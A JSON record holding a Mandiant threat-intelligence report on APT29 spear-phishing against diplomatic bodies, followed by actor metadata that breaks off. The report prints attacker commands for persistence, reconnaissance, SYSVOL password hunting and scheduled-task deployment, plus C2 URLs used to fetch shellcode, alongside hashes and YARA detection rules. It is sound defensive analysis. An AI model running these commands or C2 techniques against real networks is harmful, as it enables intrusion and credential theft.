{ "id": "46cc0b33-b6a4-4525-8e28-0bf7dc55d88e", "created_at": "2026-04-06T00:07:28.429663Z", "updated_at": "2026-04-10T03:37:32.758914Z", "deleted_at": null, "sha1_hash": "6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2", "title": "Tracking APT29 Phishing Campaigns | Atlassian Trello", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4352994, "plain_text": "Tracking APT29 Phishing Campaigns | Atlassian Trello\r\nBy Mandiant\r\nPublished: 2022-04-28 · Archived: 2026-04-05 20:18:02 UTC\r\nWritten by: John Wolfram, Sarah Hawley, Tyler McLellan, Nick Simonian, Anders Vejlby\r\nSince early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in\r\nEurope, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new\r\nmalware families in 2022, BEATDROP and BOOMMIC, as well as APT29’s efforts to evade detection through retooling\r\nand abuse of Atlassian's Trello service.\r\nAPT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the\r\nForeign Intelligence Service (SVR). The diplomatic-centric targeting of this recent activity is consistent with Russian\r\nstrategic priorities as well as historic APT29 targeting. Mandiant previously tracked this intrusion activity under multiple\r\nclusters, UNC2652 and UNC2542, which were recently merged into APT29 in April 2022. Some APT29 activity is also\r\npublicly referred to as Nobelium by Microsoft.\r\nSummary\r\nBeginning mid-January 2022, Mandiant detected and responded to an APT29 phishing campaign targeting a diplomatic\r\nentity. During the investigation, Mandiant identified the deployment and use of the BEATDROP and BOOMMIC\r\ndownloaders. Shortly following the identification of this campaign, Mandiant discovered APT29 targeting multiple\r\nadditional diplomatic and government entities through a series of phishing waves.\r\nThe phishing emails sent by APT29 masqueraded as administrative notices related to various embassies and utilized\r\nlegitimate but co-opted email addresses to send emails and Atlassian's Trello service for command and control (C2). These\r\nphishing emails were similar to previous Nobelium phishing campaigns in 2021 as they targeted diplomatic organizations,\r\nused ROOTSAW (publicly known as EnvyScout) to deliver additional payloads, and misused Firebase or DropBox for C2.\r\nThe misuse of legitimate webservices such as Trello, Firebase, or DropBox is likely an attempt to make detection or\r\nremediation harder.\r\nFigure 1: 2022 Campaign Timeline\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 1 of 14\n\nAn operational shift was observed in February 2022 when APT29 moved from deploying BEATDROP, which used a third-party cloud service to retrieve BEACON, to a simpler BEACON dropper that relied on co-opted infrastructure. The\r\nsubsequent sections will highlight the Tactics, Techniques, and Procedures as well as the tooling used by APT29 in their\r\nlatest phishing campaigns.\r\nFigure 2: Campaign Attack Lifecycle identified during 2022\r\nInitial Access\r\nTo gain access to a victim environment, APT29 sent spear-phishing emails disguised as embassy administrative updates.\r\nThese phishing emails used legitimate, but compromised email addresses from other diplomatic entities. APT29 targeted\r\nlarge lists of recipients that Mandiant suspected were primarily publicly listed points of contact of embassy personnel. These\r\nphishing emails utilized a malicious HTML dropper tracked as ROOTSAW, that makes use of a technique known as HTML\r\nsmuggling to deliver an IMG or ISO file to a victim system.\r\nFigure 3: Example APT29 Phishing Lure, with an attached file Covid.html\r\nWhen opened, the ROOTSAW HTML dropper will write an IMG or ISO file to disk. On Windows 10 or later, the image file\r\nis mounted when double-clicked and the user is presented with the image file as the folder contents in Windows Explorer.\r\nThe image file contains two additional files, a Windows shortcut (LNK) file and a malicious DLL. If the user clicks the\r\nLNK file, the “Target” command will execute as normal. This mechanism lures the victim into opening the LNK file and\r\nthus inadvertently launches the malicious DLL.\r\nFiles contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS)\r\nflag that indicates the files have been downloaded from the internet (so called “mark-of-the-web”) as reported by Didier\r\nStevens. This prevents a Windows operating system warning message for files opened from ISO or IMG image files.\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 2 of 14\n\nFigure 4: An example ISO file delivered as part of a Covid related email phishing email, without the malicious DLL or\r\nparent folder visible. In this case, the DLL is executed by rundll32.exe as referenced by the lure “Covid” LNK shortcut file.\r\nThe LNK utilized by APT29 in the early waves of this campaign shared multiple characteristics with those identified in\r\ncampaigns from 2021, including the use of a specific icon location, as well as the machine ID and MAC address. One\r\ntechnique observed being used by APT29 was using LNK file extensions that have a different icon than the target\r\napplication or document, making the shortcut appear as a document rather than a program to launch. This tricks the victim\r\ninto opening a seemingly legitimate document. Shortcut files by default also have their LNK file extension hidden, even if\r\nthe Windows Explorer “show file extensions” is enabled, further lowering any suspicion a shortcut instead of a document is\r\nopened.\r\n[icon_location] {'string': 'C:\\\\windows\\\\System32\\\\imageres.dll'}\r\nFigure 5: LNK Icon Path metadata\r\nThe “Target” in the LNK will execute the DLL with rundll32.exe and one of the DLL’s exports:\r\n[location_info] local_path: C:\\Windows\\System32\\rundll32.exe\r\n[command_line_arguments] string: trello.dll Trello\r\nFigure 6: Example LNK execution metadata for BEATDROP malicious DLLs\r\nMandiant also identified APT29 utilizing a malicious docx to deliver an HTA dropper, resulting in the delivery and\r\nexecution of BEATDROP on a target system, in a separate but similar phishing campaign.\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 3 of 14\n\nFigure 7: APT29 BEATDROP Execution chain\r\nBEATDROP is a downloader written in C that makes use of Trello for C2. Once executed, BEATDROP first maps its own\r\ncopy of `ntdll.dll` into memory for the purpose of executing shellcode in its own process. BEATDROP first creates a\r\nsuspended thread with RtlCreateUserThread which points to NtCreateFile .\r\nFollowing this, BEATDROP will enumerate the system for the username, computer name, and IP address. This information\r\nis used to create a victim ID, which is used by BEATDROP to store and retrieve victim payloads from its C2. Once the\r\nvictim ID is created, BEATDROP will make an initial request to Trello to identify whether the current victim has already\r\nbeen compromised. The process to identify whether the victim is already compromised begins with a GET request to\r\nretrieve the user ID from the following URL:\r\nhttps://api.trello.com/1/members/me/boards?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 9: BEATDROP User ID URL\r\nBEATDROP then uses the user ID received from the URL in Figure 9 to list the boards related to the user, which contain all\r\ncurrent victims.\r\nhttps://api.trello.com/1/boards/\u003cuser_id\u003e/lists?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 10: BEATDROP User ID boards URL\r\nBEATDROP enumerates the victim boards to identify if the current target exists in the database or not. If the current victim\r\ndoes not, BEATDROP crafts a POST request to add the victim to the database using the data enumerated from the host.\r\n{\r\n \"id\": \"\u003cvaries\u003e\",\r\n \"name\": \"username\\ncomputername\\nip_address\",\r\n \"closed\": false,\r\n \"pos\": 0.5,\r\n \"softLimit\": null,\r\n \"idBoard\": \"\u003credacted\u003e\",\r\n \"subscribed\": false\r\n}\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 4 of 14\n\nFigure 11: Example BEATDROP Victim Entry\r\nOnce the victim is either identified or added to the database, BEATDROP will send a request to gather the victim board for\r\nthe current target:\r\nhttps://api.trello.com/1/lists/\u003clist_id\u003e/cards?key=\u003credacted\u003e\u0026token=3\u003credacted\u003e\r\nFigure 12: BEATDROP Victim Board URL\r\nBEATDROP will then enumerate the response to determine if a payload exists for the current victim. If one does,\r\nBEATDROP will then send a request to determine the URL to retrieve the final payload. The final URL will deliver the\r\npayload AES encrypted as its response.\r\nhttps://api.trello.com/1/cards/\u003credacted\u003e/attachments?key=\u003credacted\u003e\u0026token=\u003credacted\u003e\r\nFigure 13: BEATDROP Victim Attachment Board URL\r\nhttps://trello.com/1/cards/\u003credacted\u003e/attachments/\u003credacted\u003e/download/\u003cpayload name\u003e\r\nFigure 14: BEATDROP Final Payload URL\r\nFor most of the aforementioned requests to the Trello API the key and token inserted as URL parameters is enough to\r\nretrieve the information from the Trello API. In the case of using the download API however, Trello requires the use of a\r\nheader which is also embedded in the BEATDROP samples:\r\nAuthorization: OAuth oauth_consumer_key=\"\u003credacted\u003e\", oauth_token=\"\u003credacted\u003e\"\r\nFigure 15: BEATDROP Authorization Header\r\nAnalysis of early BEATDROP samples identified the malware utilized an interesting User Agent when communicating with\r\nits C2. The initial User Agent string was related to Apple iPads, however Mandiant observed a shift in TTPs in later\r\nBEATDROP samples to utilizing more commonly observed Windows User Agent strings.\r\nMozilla/5.0 (iPad; CPU OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/\r\nFigure 16: Initial BEATDROP User Agent string\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 5 of 14\n\nFigure 17: BEATDROP writing shellcode to memory\r\nFigure 18: BEATDROP resuming thread of mapped NTDLL\r\nBEATDROP is an ideal example of APT29’s continued efforts to obfuscate its activity and maintain persistent access.\r\nFollowing multiple waves of phishing utilizing BEATDROP to target diplomatic entities, Mandiant along with other\r\nresearchers identified APT29 moving away from BEATDROP to a novel C++ BEACON loader in their latest campaigns\r\nagainst diplomatic entities. Several scenarios could explain this shift in tooling including the possibility that BEATDROP\r\nwas no longer providing value to the group in terms of capability, or reflective of operational TTPs to periodically retool for\r\nthe purposes of evading detection.\r\nEstablish Foothold\r\nFollowing the successful deployment of BEATDROP to deliver and execute a payload, APT29 was observed leveraging\r\nBOOMMIC to further establish a foothold within the environment. BOOMMIC, also known as VaporRage by Microsoft, is\r\na shellcode downloader written in C that communicates over HTTP to co-opted infrastructure used for C2. APT29 executed\r\nBOOMMIC through DLL Side Loading of a modified version.dll by a legitimate Java binary, jucheck.exe.\r\nAPT29 first deployed BOOMMIC within minutes following the successful execution of BEATDROP. The group deployed\r\nthe malicious BOOMMIC DLL javafx_font.dll (363a95777f401df40db61148593ea387) alongside two additional files:\r\njucheck.exe (da24b2783758ff5ccc2d0f5ebcc2a218)\r\nversion.dll (8bb3d91b666813372e66903209bd45fd)\r\nPrior to executing BOOMMIC APT29 was observed creating persistence via a registry key for “Java Update” that would\r\nexecute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload.\r\nreg add \"HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Java Update\" /t REG_SZ /d \"c:\\users\\\u003credacted\u003e\\appdata\\\r\nFigure 19: BOOMMIC Persistence\r\nAPT29 then executed jucheck.exe via wmic which then loaded and executed BOOMMIC based on DLL Side Loading.\r\nwmic process call create \"c:\\users\\\u003credacted\u003e\\appdata\\local\\Java\\jucheck.exe\"\r\nFigure 20: APT29 execution of BOOMMIC\r\nVersion.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a\r\nlegitimate java binary used to check for any updates.This file will load version.dll upon its execution. Version.dll is an\r\nunsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32,\r\nbut retains its PE header.An additional import was added to the modified version.dll, which imports the malicious function\r\nfrom javafx_font.dll.\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 6 of 14\n\nFigure 21: CFF Explorer view of version.dll imports, left the original and right the modified DLL, with the additional\r\njavafx_font.dll added to the import table in the malicious DLL\r\nWhen version.dll imports BOOMMIC, it also executes BOOMIC’s DllMain function, which can be seen in Figure 22.\r\nFigure 22: BOOMMIC DLLMain\r\nWithout the modified version.dll present within its directory being launched, executing jucheck.exe will not result in\r\nBOOMMIC running.\r\nBOOMMIC, similar to previous reporting by Microsoft on VaporRage, contains multiple export functions. In the case of\r\n363a95777f401df40db61148593ea387, the export function that contains the primary functionality of BOOMMIC is\r\nJava_com_sun_javafx_font_PrismFontFactory_getLCDContrastWin32.\r\nFigure 23: BOOMMIC Exports\r\nThe primary function of BOOMMIC is to download and load shellcode payloads into memory on a target. Once executed,\r\nBOOMMIC first checks if it is running under the process jucheck.exe, if it is not the program will exit. Analysis of\r\nBOOMMIC identified strings throughout the program are encoded using XOR, alternating bytes by 0x0C and 0x4D.\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 7 of 14\n\nFigure 24: BOOMMIC check for jucheck.exe\r\nIf the malware is running under jucheck.exe, it will then create a host id for the compromised target to be used in the request\r\nto download a payload. The host id is created by hex-encoding the DNS domain and legacy account name of the target\r\nsystem. These values are then formatted in the following manner: dns_domain_account_name, after both dns_domain and\r\naccount_name are encoded by adding 3 to the ordinal of each character.\r\nFigure 25: BOOMMIC host id creation\r\nOnce the host id has been created, BOOMMIC passes this value to the function used to download and execute payloads to\r\nbe used as part of the request. BOOMMIC then sends a GET request to its C2 to download and execute a shellcode payload.\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 8 of 14\n\nMandiant observed APT29 leveraging compromised websites as the C2 for BOOMMIC. Once a payload is successfully\r\ndownloaded, BOOMMIC XOR decodes and then executes it in memory.\r\nhttps://maybyrne[.]co[.]uk/modules/mod_search/mod_global_search.php?bin_data=\u003chost_id\u003e\u0026Article=AboutMe\r\nFigure 26: Example of a BOOMMIC GET request, misusing a compromised website as C2\r\nEscalate Privileges\r\nMandiant observed APT29 quickly move to escalate their privileges within domains once access was established. In\r\nmultiple cases, APT29 was able to gain Domain Admin in less than 12 hours from the initial phishing payload’s execution.\r\nAPT29 was observed utilizing a variety of TTPs to escalate their privileges. In one instance, APT29 was observed writing\r\nfiles that contained Kerberos tickets most likely to be used in Pass the Ticket attacks or for offline cracking.\r\nAPT29 was also observed exploiting misconfigured certificate templates to allow them to impersonate admin users. From\r\nhere, APT29 created additional malicious certificates which they used to move laterally within the environment. This recent\r\ntechnique, which is well documented in a report from SpecterOps and was presented at Blackhat in August 2021, gives the\r\nattacker the ability to quickly escalate their privileges within the environment, but also provides a method for long term\r\npersistence through the creation of malicious certificates.\r\nA brief overview of the technique as used by APT29 in actual compromises that Mandiant investigated follows.\r\nMicrosoft offers “Active Directory Certificate Services” (AD CS) for providing certificate enrollment, revocation and trust\r\nsetup. It allows for setting up the “Public Key Infrastructure” (PKI) needed for issuing certificates for internal HTTPS sites,\r\nVPNs, certificate based authentication etc.\r\nAD CS will enable the setup of “Certificate Templates” that are used when generating new certificates. The particular\r\nmisconfiguration abused by APT29, referenced by SpecterOps as ESC1, allows low-privileged users to escalate directly to\r\nDomain Admin. Related to this specific case of abuse, three distinct settings on a certificate template are important:\r\nWho can request a certificate using the template\r\nWhat is the allowed usage of a certificate from the template\r\nIs Subject Alternative Names (SAN) allowed\r\nWhat are the issuance requirements\r\nIn multiple cases the attacker found certificate templates with “Domain Users” enrollment rights, meaning all users can\r\nrequest the certificate, a usage including “Client Authentication”, meaning the certificate can be used to authenticate users,\r\nand a setting allowing the Subject and SAN to be specified by the requester (“ENROLLEE_SUPPLIES_SUBJECT”).\r\nWhen performing authentication to Active Directory with Kerberos using the Public Key Cryptography for Initial\r\nAuthentication (PKINIT) Kerberos flow, the Domain Controller will verify the SAN against the User Principal Name (UPN)\r\nof the authenticating principal. Therefore, being allowed to specify an arbitrary SAN allows the requester of the certificate to\r\nimpersonate any principal in the domain.\r\nThese settings allowed the attacker to request a certificate with a low privileged account and specify a high-privileged\r\naccount in the SAN field and use this certificate for authentication. The practical steps beyond the aforementioned creation\r\nof the certificate are to use the certificate with a request for a Ticket Granting Ticket (TGT) and then use that TGT for\r\nauthentication.\r\nThe linked SpecterOps document provides much more detail and additional techniques besides this one example.\r\nReconnaissance\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 9 of 14\n\nOnce APT29 established access, Mandiant observed the group performing extensive reconnaissance of hosts and the Active\r\nDirectory environment. The group was also observed conducting on-host reconnaissance looking for credentials.\r\nOne of the first commands employed by the group was the windows net command. APT29 was observed using the net\r\ncommand widely to enumerate users and groups.\r\n net use\r\n net localgroup Administrators\r\n net1 localgroup Administrators\r\n net user /domain \u003credacted\u003e\r\n net group /domain \"Enterprise Admins\"\r\nFigure 27: APT29 net recon commands\r\nAPT29 was also observed by Mandiant using nltest to enumerate Domain Controllers on the domain:\r\n C:\\\\WINDOWS\\\\system32\\\\cmd.exe /C nltest /dclist:DOMAIN\r\nFigure 28: APT29 nltest recon\r\nOne notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords\r\nthat are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that\r\ncan easily be decrypted. Microsoft fixed this in MS14-025 which removed the option of configuring Group Policy\r\nPreferences with the “cpassword”. While the patch was issued in 2014 it is still possible to come across systems with\r\npasswords stored in Group Policy Preferences, either due to the patch never having been applied or because the patch does\r\nnot remove existing Group Policy Preferences that contain passwords (as Microsoft does not risk breaking existing\r\nfunctionality).\r\nC:\\WINDOWS\\system32\\cmd.exe /C findstr /S /I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml\r\nFigure 29: APT29 GPP password datamining\r\nLateral Movement\r\nMandiant observed APT29 quickly moving laterally within an environment. To facilitate lateral movement APT29 relied on\r\na combination of malicious certificates used for impersonation of privileged users and SMB BEACON.\r\nAPT29 was first observed moving laterally after the group was seen staging and deploying SMB BEACON to multiple\r\nsystems. To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the\r\ngroup to impersonate a privileged user. The first evidence of SMB BEACON being deployed was seen through the local\r\nstaging of a zip file shortly following the successful execution of BOOMMIC.\r\npowershell -c \"expand-archive SharedReality.zip SharedReality.dll\"\r\nFigure 30: SMB BEACON staging\r\nAnalysis of SharedReality.dll identified it to be a memory-only dropper written in Go language that decrypts and executes\r\nan embedded BEACON payload. The BEACON payload was identified to be SMB BEACON that communicates over the\r\nfollowing named pipe:\r\n\\\\.\\pipe\\SapIServerPipes-1-15-21-07836\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 10 of 14\n\nFigure 31: SharedReality.dll Named Pipe\r\nAPT29 was then observed utilizing the impersonation of a privileged user to copy SharedReality.dll to the Temp directory of\r\nmultiple systems. The group then deployed it via a scheduled task named SharedRealitySvcDLC which was installed and\r\nexecuted. After executing the scheduled task, the task was then immediately deleted.\r\nschtasks /create /s \u003cREDACTED\u003e /tn \"SharedRealitySvcDLC\" /ru SYSTEM /tr \"C:\\Windows\\System32\\rundll32.exe c:\\Windows\\Tem\r\nFigure 32: BEACON Scheduled Task\r\nMaintain Presence and Complete Mission\r\nAs previously noted, Mandiant has observed the group widely using scheduled tasks, run keys, malicious certificates, and\r\nin-memory backdoors, in some cases multiple per system. The use of these techniques and tools represents the multiple\r\nmeans by which APT29 attempts to maintain access within an environment. This is further supported by the activity\r\nidentified by Mandiant that saw APT29 writing zip files that contained Kerberos tickets as well as the creation and most\r\nlikely exportation of malicious certificates.\r\nThe totality of the TTPs used by APT29 supports the assessment that APT29's goal in these campaigns is to establish\r\nmultiple means of long-term access to facilitate intelligence collection for espionage purposes within the targeted diplomatic\r\nentities’ victim networks.\r\nOutlook and Implications\r\nThis latest wave of spear phishing showcases APT29’s enduring interests in obtaining diplomatic and foreign policy\r\ninformation from governments around the world. The shift away from BEATDROP to BEACON further highlights the\r\ngroup’s efforts to vary its TTPs and alter BEACON delivery mechanisms via spear phishing campaigns that follow a notable\r\npattern.\r\nMandiant anticipates sustained waves of phishing activity by APT29 that employ novel tools and infrastructure to hinder\r\ndetection. While these campaigns are likely to be directed against diplomatic missions and foreign policy information as part\r\nof the group’s mandate to support Russian strategic interests, the invasion of Ukraine and heightened tensions between the\r\nWest, Europe, and Russia are likely to influence the intensity and urgency of collection operations. \r\nMalware Descriptions\r\nDuring this phishing campaign, Mandiant observed APT29 utilizing the following malware families:\r\nBEATDROP:\r\nBEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C\u0026C.\r\nBEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be\r\nexecuted. BEATDROP then injects and executes downloaded payloads into a suspended process.\r\nUpon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process.\r\nThe sample then creates a suspended thread with RtlCreateUserThread the thread points to NtCreateFile. The\r\nsample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello\r\nand is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.\r\nBOOMMIC\r\nBOOMMIC, publicly referred to as VaporRage, is a shellcode downloader written in C that communicates\r\nover HTTPS. Shellcode Payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated\r\nfrom the targets domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in\r\nmemory and executes it.\r\nBOOMMIC is executed by jucheck.exe through DLL side-loading that executes a malicious javafx_font.dll\r\nBOOMMIC payload\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 11 of 14\n\nROOTSAW\r\nROOTSAW, publicly referred to as EnvyScout, is a dropper HTML file that contains Javascript which XOR\r\nand Base64 decodes an embedded ISO/IMG file to be further executed.\r\nBEACON:\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor\r\ncommands include shell command execution, file transfer, file execution, and file management. BEACON can\r\nalso capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with\r\nharvesting system credentials, port scanning, and enumerating systems on a network. BEACON\r\ncommunicates with a C2 server via HTTP or DNS.\r\nTechnical Indicators\r\nMalware\r\nFamily\r\nMD5 SHA256\r\nROOTSAW 2f712cdae87cdb7ccc0f4046ffa3281d 207132befb085f413480f8af9fdd690ddf5b9d21a9ea0d4a4e75f34f023ad95\r\nROOTSAW 4ae0b6be7f38e2eb84b881abf5110edc 538d896cf066796d8546a587deea385db9e285f1a7ebf7dcddae22f8d61a27\r\nROOTSAW 628799f1f8146038b488c9ed06799b93 a896c2d16cadcdedd10390c3af3399361914db57bde1673e46180244e806a\r\nBEATDROP 6ac740ebf98df7217d31cb826a207af6 2f11ca3dcc1d9400e141d8f3ee9a7a0d18e21908e825990f5c22119214fbb2\r\nBEATDROP a0b4e7622728c317f37ae354b8bc3dbb 8bdd318996fb3a947d10042f85b6c6ed29547e1d6ebdc177d5d85fa26859e\r\nBEATDROP e031c9984f65a9060ec1e70fbb84746b 95bbd494cecc25a422fa35912ec2365f3200d5a18ea4bfad5566432eb0834f\r\nBOOMMIC 363a95777f401df40db61148593ea387 8cb64b95931d435e01b835c05c2774b1f66399381b9fa0b3fb8ec07e18f83\r\nBEACON  –\r\nDLL\r\n37ea95f7fa8fb51446c18f9f3aa63df3 6ee1e629494d7b5138386d98bd718b010ee774fe4a4c9d0e069525408bb7b\r\nBEACON –\r\nISO\r\nDropper\r\n97fa94e60ccc91dcc6e5ee2848f48415 3cb0d2cff9db85c8e816515ddc380ea73850846317b0bb73ea6145c026276\r\nBEACON –\r\nLNK\r\nLauncher\r\nda1787c54896a926b4893de19fd2554c fdce78f3acfa557414d3f2c6cf95d18bdb8de1f6ffd3585256dfa682a441ac04\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 12 of 14\n\nBEACON – \r\nDLL\r\n8716cec33a4fea1c00d57c4040945d9e e8da0c4416f4353aad4620b5a83ff84d6d8b9b8a748fdbe96d8a4d02a4a1a0\r\nBEACON –\r\nISO\r\nDropper\r\n4af2a3d07062d5d28dad7d3a6dfb0b4b 34e7482d689429745dd3866caf5ddd5de52a179db7068f6b545ff51542abb\r\nBEACON –\r\nLNK\r\nLauncher\r\nc23f1af6d1724324f866fe68634396f9 e5de12f16af0b174537bbdf779b34a7c66287591323c2ec86845cecdd9d57f\r\nDetections\r\nrule M_APT_Downloader_BEATDROP\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looking for BEATDROP malware\"\r\n strings:\r\n $ntdll1 = \"ntdll\" ascii fullword\r\n $ntdll2 = \"C:\\\\Windows\\\\System32\\\\ntdll.dll\" ascii fullword nocase\r\n $url1 = \"api.trello.com\" ascii\r\n $url2 = \"/members/me/boards?key=\" ascii\r\n $url3 = \"/cards?key=\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 1MB and all of them\r\n}\r\nimport \"pe\"\r\nrule M_APT_Downloader_BOOMMIC {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looking for BOOMMIC malware\"\r\n strings:\r\n $loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D\r\n $loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }\r\n $func1 = \"GetComputerNameExA\" ascii\r\n $func2 = \"HttpQueryInfoA\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 1MB and\r\n (\r\n ($loc_10001000 and $func1) or\r\n ($loc_100012fd and $func2)\r\n )\r\n}\r\nThu, 04/28/2022 - 10:21\r\nPosted in\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 13 of 14\n\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nhttps://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns" ], "report_names": [ "tracking-apt29-phishing-campaigns" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", 